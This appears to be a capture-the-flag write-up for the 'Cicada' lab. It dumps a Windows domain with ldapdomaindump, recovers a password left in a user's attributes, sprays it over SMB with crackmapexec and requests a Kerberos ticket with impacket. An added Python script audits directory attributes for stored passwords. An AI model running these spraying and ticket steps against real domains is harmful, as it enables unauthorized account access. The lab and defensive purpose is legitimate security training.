LDAPDomainDump
Using the valid domain credential, I can use ldapdomaindump to get an overview of the target domain
┌──(kali㉿kali)-[~/…/htb/labs/cicada/ldapdomaindump]
└─$ ldapdomaindump ldap://$IP:389 -u 'CICADA.HTB\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -n $IP --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
completed
Computers
Groups
Those 2 groups are the only non-default groups
Users
There is a CLEARTEXT password disclosure for the david.orelious user; aRt$Lp#7t*VQ!3
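The same exposure can be found from the defender's side by auditing the directory's free-text user attributes. The sketch below is an added example, not part of the original write-up. It assumes user records shaped like ldapdomaindump's JSON output (objects with an `attributes` map of lists); the attribute list, the heuristic and the sample records are assumptions constructed for illustration.

```python
import re

# Free-text attributes readable by any authenticated user (assumed list).
FREE_TEXT_ATTRS = ("description", "info", "comment")
KEYWORDS = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?)\b", re.I)

def char_classes(token):
    """Count how many of lower/upper/digit/symbol occur in the token."""
    checks = (str.islower, str.isupper, str.isdigit, lambda c: not c.isalnum())
    return sum(any(check(c) for c in token) for check in checks)

def looks_like_secret(token):
    """Heuristic: 8+ characters mixing at least three character classes."""
    token = token.strip(".,;:()\"'")
    return len(token) >= 8 and char_classes(token) >= 3

def mask(token):
    """Keep two characters so the finding is traceable without re-leaking it."""
    return token[:2] + "*" * (len(token) - 2)

def audit_users(records):
    """Return one finding per attribute value that hints at a stored credential."""
    findings = []
    for rec in records:
        attrs = rec.get("attributes", {})
        name = (attrs.get("sAMAccountName") or ["?"])[0]
        for attr in FREE_TEXT_ATTRS:
            for value in attrs.get(attr, []):
                tokens = [t for t in value.split() if looks_like_secret(t)]
                keyword = bool(KEYWORDS.search(value))
                if tokens or keyword:
                    findings.append({"user": name, "attribute": attr,
                                     "keyword": keyword,
                                     "masked": [mask(t) for t in tokens]})
    return findings

# Constructed sample records (not taken from the target in this write-up).
SAMPLE = [
    {"attributes": {"sAMAccountName": ["svc.backup"],
                    "description": ["Nightly backup service account"]}},
    {"attributes": {"sAMAccountName": ["j.doe"],
                    "description": ["Just in case I forget my password is Ex4mple#Pass!9"]}},
    {"attributes": {"sAMAccountName": ["a.lee"], "info": ["temp: Welc0me-2024x"]}},
    {"attributes": {"sAMAccountName": ["guest"]}},
]

if __name__ == "__main__":
    for finding in audit_users(SAMPLE):
        print(finding)
```

Each finding should be followed by a password reset for that account and removal of the value from the attribute, since the old password stays valid until it is changed.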
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ crackmapexec smb $IP -u users.txt -p 'aRt$Lp#7t*VQ!3' --continue-on-success
SMB 10.129.41.192 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.41.192 445 CICADA-DC [-] cicada.htb\administrator:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.129.41.192 445 CICADA-DC [-] cicada.htb\guest:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.129.41.192 445 CICADA-DC [-] cicada.htb\cicada-dc$:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.129.41.192 445 CICADA-DC [-] cicada.htb\john.smoulder:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.129.41.192 445 CICADA-DC [-] cicada.htb\sarah.dantelia:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.129.41.192 445 CICADA-DC [-] cicada.htb\michael.wrightson:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
SMB 10.129.41.192 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.41.192 445 CICADA-DC [-] cicada.htb\emily.oscars:aRt$Lp#7t*VQ!3 STATUS_LOGON_FAILURE
Valid
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-getTGT 'CICADA.HTB/david.orelious@cicada-dc.cicada.htb' -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: aRt$Lp#7t*VQ!3
[*] Saving ticket in david.orelious@cicada-dc.cicada.htb.ccache
TGT generated for the david.orelious user